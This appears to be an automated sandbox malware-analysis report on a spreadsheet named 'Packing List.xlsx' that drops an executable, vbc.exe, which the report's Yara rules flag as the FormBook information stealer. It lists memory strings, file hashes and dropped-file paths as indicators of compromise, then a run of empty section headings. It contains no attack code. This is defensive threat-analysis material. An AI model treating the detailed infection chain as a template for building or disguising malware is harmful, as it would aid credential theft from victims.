Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

5_2_004030FB

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

ID:	510251
Product:	CloudBasic
Start time:	16:32:11
Start date:	27.10.2021
Sample:	Packing List.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	74c72f37e68bc3a8071467dd12bfaa7f
SHA1:	5dd9599fde86870f52169a85cfb76020f504e43c
SHA256:	de736eaf65c73f1aef5b09aa639d82e44129ac1300fd5411cab342e9e33faf7c
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DF330AB2A2E5AA4AC947315EE3F93992	76B5D1EEE342B47FE58E2136A067712CBD210351	99A897C5B8F53E1D04E51107C748A4F385B754A852CA6B605559F5B50820A64F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\251FF695.png	PNG image data, 550 x 360, 8-bit colormap, non-interlaced	79996F390643F9E11F14334A3740FA5E	3A99EC9B5E2057264FFE629D3ABA182912EDB80E	406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	C68C54CBF6E515EC83B659DC674D2013	AF1569EFB4539B1DB71B3D023869D4DB7AA133A8	986959C09FA256369BA2D9DEF03B2A661E745E470FE8E196EE79A7083CE80869
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5268BA6B.png	PNG image data, 838 x 469, 8-bit colormap, non-interlaced	5A25F525D9F0D658AF52A4F78FE031D4	525FB63F75E745FBC90E4E42E624E030C5DF94EB	D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67EFF2A.png	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced	9F9A7311810407794A153B7C74AED720	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6EA2EAB1.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\731170FE.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84D2F0C8.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9950728D.png	PNG image data, 838 x 469, 8-bit colormap, non-interlaced	5A25F525D9F0D658AF52A4F78FE031D4	525FB63F75E745FBC90E4E42E624E030C5DF94EB	D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4C845BC.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B5F0E7.png	PNG image data, 550 x 360, 8-bit colormap, non-interlaced	79996F390643F9E11F14334A3740FA5E	3A99EC9B5E2057264FFE629D3ABA182912EDB80E	406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D937B123.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Temp\dobvw7pi71yxrkawv	data	C18BE7539F4915669E9EA3DAA057DDCF	DF46D7153A977EF06D55F6BF79E9641CC166734E	6B780DFC77A0F9894AEBF1322FB264C1B1E58E5A006543C7493CB7879B8F2231
C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	C2C405109B51233DEF2B5BF15FFD2308	14DEBD98B26EDBA7788AAFCAA41F1D32E8FE1CBC	7E16ED39BA05C887E6D1B470B6CC8DE06FD67ED81FB2DA85F645CFBC643CA154
C:\Users\user\AppData\Local\Temp\~DF3DF424E48F9DA5FE.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF60529B904FCF6857.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF63AE2933B69E3EF1.TMP	CDFV2 Encrypted	74C72F37E68BC3A8071467DD12BFAA7F	5DD9599FDE86870F52169A85CFB76020F504E43C	DE736EAF65C73F1AEF5B09AA639D82E44129AC1300FD5411CAB342E9E33FAF7C
C:\Users\user\AppData\Local\Temp\~DFB3F4E2B4E1F422B3.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$Packing List.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DF330AB2A2E5AA4AC947315EE3F93992	76B5D1EEE342B47FE58E2136A067712CBD210351	99A897C5B8F53E1D04E51107C748A4F385B754A852CA6B605559F5B50820A64F

Windows Analysis Report Packing List.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs